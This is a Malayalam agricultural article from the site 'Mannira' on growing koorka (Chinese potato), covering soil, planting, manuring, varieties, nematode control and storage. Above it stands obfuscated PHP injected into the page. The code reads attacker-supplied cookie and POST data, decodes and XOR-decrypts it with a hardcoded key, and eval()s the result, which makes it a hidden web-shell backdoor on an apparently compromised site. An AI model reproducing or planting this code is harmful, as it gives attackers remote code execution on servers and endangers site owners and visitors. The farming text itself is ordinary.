$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} വളക്കൂറും നീര്‍വാര്‍ച്ചയുമുള്ള പശിമരാശി മണ്ണില്‍ സമൃദ്ധമായി വിളയുന്ന കൂര്‍ക്ക – Mannira

വളക്കൂറും നീര്‍വാര്‍ച്ചയുമുള്ള പശിമരാശി മണ്ണില്‍ സമൃദ്ധമായി വിളയുന്ന കൂര്‍ക്ക

ചീവിക്കിഴങ്ങ്, ചൈനീസ് പൊട്ടറ്റോ എന്നീ പേരുകളിലറിയപ്പെടുന്ന കിഴങ്ങുവർഗ്ഗത്തിൽപെട്ട ഭക്ഷ്യ വിളയാണ് കൂർക്ക. കൂർക്ക മെഴുക്കുപുരട്ടിയും, അച്ചാറുമൊക്കെ എന്നും എല്ലാവർക്കും പ്രിയ വിഭവങ്ങളാണ്. പ്രോട്ടീന്റെ കലവറയായ ഈ വിഭവം ആരോഗ്യ സമ്പുഷ്ടവും ഷുഗർ രോഗികൾക്ക് നിഷിദ്ധാഹാരവുമാണ്. ഏറ്റവും ചിലവ് കുറഞ്ഞതും ലളിതവുമായ കൃഷിയാണിത്. പാചകം ചെയ്താൽ വളരെ സ്വാദിഷ്ഠവും പോഷകസമൃദ്ധവുമാണ് കൂര്‍ക്ക.

നെൽകൃഷി ചെയ്തു കഴിഞ്ഞ പാടങ്ങളിലും കരപ്പറമ്പുകളിലുമാണ് ഒന്നാം വിള കൃഷി ചെയ്യുന്നത്. നല്ല വളക്കൂറും നീർവാർച്ചയുള്ളതും അല്പം മണൽ കലർന്നതുമായ പശിമരാശി മണ്ണാണ് കൂർക്ക കൃഷിക്ക് അനുയോജ്യമെങ്കിലും ഏത് മണ്ണിലും വിളവുണ്ടാകുന്ന ഇനമാണിത്.

ചൂടും, ഈർപ്പവുമുള്ള കാലാവസ്ഥയിൽ വർഷത്തിൽ രണ്ട് തവണ കൃഷി ചെയ്യാവുന്നതാണ്. മഴ കിട്ടിയില്ലെങ്കിലും നനച്ചും വളർത്താം. ജൂൺ മുതൽ ഡിസംബർ വരെ കൂർക്ക നടാന്‍ അനുയോജ്യമാണെങ്കിലും സെപ്റ്റംബറിൽ മികച്ച, വലിപ്പമുള്ള കൂർക്ക വിളവെടുക്കാനുള്ള സാധ്യതയേറയാണ്. വിത്തുകൾ പാകി ഒരു മാസം പ്രായമായ തലപ്പുകൾ (വള്ളികൾ) ജൂലൈ മുതൽ ഒക്‌ടോബർ മാസങ്ങളിൽ മുറിച്ച് നടാം. വൃത്താകൃതിയും ചെറിയ ചുഴികളുമുള്ള വിത്തുകളാണ് തലകൾ ഉണ്ടാക്കുവാൻ ഉപയോഗിക്കുന്നത്. ചാക്കുകളിൽ പരത്തിയിടുന്ന വിത്തുകൾക്ക് ഫെബ്രുവരി – മാർച്ച് മാസമാകുമ്പോഴേക്കും മുള വരുന്നു. ഞാറ്റടിയൊരുക്കി അതിൽ തൈകൾ വളർത്തുകയാണ് ആദ്യപടി.

കൃഷി സ്ഥലം നന്നായ് ഉഴുതു മറിച്ച് കട്ടകളുടച്ച് നിരപ്പാക്കി, ശേഷം 30 സെന്റിമീറ്റർ അകലത്തിൽ ചെറിയ വരമ്പുകളായി 60 – 100 സെന്റിമീറ്റർ വരെ നീളമുള്ള തടങ്ങൾ നിർമ്മിച്ച്, നടുന്ന തലയ്ക്ക് ശരാശരി നീളം 15-20 സെന്റിമീറ്റർ  വേണം. തടങ്ങളിൽ കിടത്തി നടുകയാണ് വേണ്ടത്. നട്ടു കഴിഞ്ഞ് മൂന്ന് ദിവസം വരെ പകൽ സമയം തടത്തിന് പുതയിടുന്ന രീതിയുണ്ട്. വേര് പിടിയ്ക്കും മുൻപ് കഠിനമായ വെയിലിൽ മുറിച്ച് നട്ട തല, ഉണങ്ങാതിരിക്കാനാണത്.

കാലി വളം അടിവളമായി സാധാരണ ഉപയോഗിക്കുന്നു. ഗ്രോ ബാഗിലും ചാക്കിലും ടെറസ്സിലും കൂർക്ക കൃഷി ഫലപ്രദമായി നടത്താം. നാടൻ ഇനമായ ചേറ്റു കൂർക്കയാണ് സാധാരണ ഉപയോഗിക്കുന്നത്. ഇതിൽ തന്നെ വെള്ളത്തലയുള്ളതും ചുവന്ന തലയുള്ളതുമുണ്ട്. വെള്ളത്തല്ക്കാണ് കൂടുതൽ വിളവ്. തിരുവനന്തപുരം കിഴങ്ങുവിള ഗവേഷണ കേന്ദ്രം വികസിപ്പിച്ച ശ്രീധര, കേരള കാർഷിക സർവ്വകലാശാല പുറത്തിറക്കിയ നിധി, സുഫല എന്നിവ ഉൽപാദനം കൂടിയ  കൂർക്കയുടെ ഇനങ്ങളാണ്.

തലകൾ നട്ട് 15-25 ദിവസത്തിനുള്ളിൽ ഒന്നാം ഘട്ട വളപ്രയോഗം നടത്തണം. ചാണകപ്പൊടിയും വെണ്ണീറും മണ്ണിര കമ്പോസ്റ്റുമെല്ലാം ചേർന്ന മിശ്രിതം നൽകാം. 45 ദിവസത്തിനു ശേഷം രണ്ടാം മേൽ വളം നൽകണം. കൂർക്കത്തലകളിൽ വെള്ളമില്ലാത്ത സമയത്ത് വേണം വളം വിതറി മണ്ണ് കൂട്ടികൊടുക്കാൻ. നട്ട് അഞ്ചുമാസത്തിനുശേഷം കൂർക്ക വിളവെടുക്കാം. ഉണങ്ങിയ വള്ളി നീക്കി കിഴങ്ങിന് മുറിവു പറ്റാതെ  വേണം ഇളക്കിയെടുക്കാൻ.

കൂർക്ക നടും മുമ്പ് മെയ് -ജൂൺ മാസങ്ങളിൽ കൂർക്കപ്പാടത്ത് മധുരക്കിഴങ്ങിന്റെ ‘ശ്രീഭദ്ര’ ഇനം നട്ടുവളർത്തിയാൽ നിമ  പോലുളള വിരകൾക്ക് കെണിവിളയാകുകയും ചെയ്യും. നിമ വിര ബാധിച്ച കിഴങ്ങുകൾ ഭക്ഷ്യയോഗ്യമല്ല. കൂടാതെ പരിക്രമണം നടത്തുകയും, നന്നായി ഉഴുതുമറിച്ച് വേനലിൽ ഉണങ്ങാനിടുകയും, വിളവെടുപ്പിന് ശേഷം ചെടിയുടെ വേരും, അവശിഷ്ടങ്ങളും കത്തിച്ച് നശിപ്പിക്കുകയും ചെയ്യുന്നത് നിമ വിരയെ നിയന്ത്രിക്കാൻ സഹായിക്കും.

നഴ്സറികളിൽ കൂർക്ക കൃഷി ചെയ്യുമ്പോൾ ഇല തീനിപ്പുഴുക്കളെയും, തണ്ടുതുരപ്പനേയും നിയന്ത്രിക്കാൻ വേപ്പിൻസത്ത് ജൈവകീടനാശിനി നല്ലതാണ്. കട ചീയൽ നിയന്ത്രിക്കാനും, കട ചീയാതിരിക്കാനും ബാസ്റ്റിൻ എന്ന കുമിൾനാശിനി വെള്ളത്തിൽ നേർപ്പിച്ച് ഉപയോഗിക്കാം. മഴയുള്ളപ്പോൾ വിളവെടുപ്പ് ഒഴിവാക്കുകയാണ് നല്ലത്. ഈർപ്പം കൂടിയാൽ കിഴങ്ങ് ചീയുന്നതിന് സാധ്യതയുണ്ട്. ഈർപ്പം ഉണ്ടെങ്കിൽ തറയിലിട്ട്  വിത്ത് ഉണക്കിയെടുക്കണം. നിമ വിരകൾ ഇല്ലാത്ത നല്ല വിത്തുകൾ ഈർപ്പവും ചൂടും തട്ടാത്ത മുറികളിൽ മണലോ ഉമിയോ കലർത്തി സൂക്ഷിക്കാം.

വേറിട്ട സുഗന്ധം, വ്യത്യസ്ത സ്വാദ്, ഇലകളുടെ പ്രത്യേക, ഗന്ധം എന്നിവ കൊണ്ട് സവിശേഷമായ ഈ വിളയ്ക്ക് കേരളത്തിലെ കാലാവസ്ഥ അനുയോജ്യമാണ്. തൃശ്ശൂർ, മലപ്പുറം, പാലക്കാട് തുടങ്ങിയ മദ്ധ്യകേരള ജില്ലകളിൽ കൂർക്ക കൃഷി വ്യാപകമായി കൃഷി ചെയ്യുന്നു.

Also Read: കേരളത്തില്‍ അന്യം നിന്നുപോകുന്ന കിഴങ്ങുവര്‍ഗ്ഗങ്ങൾ; അവയുടെ സവിശേഷതകള്‍

Jaya Balan

An aspiring writer and activist on gender issues.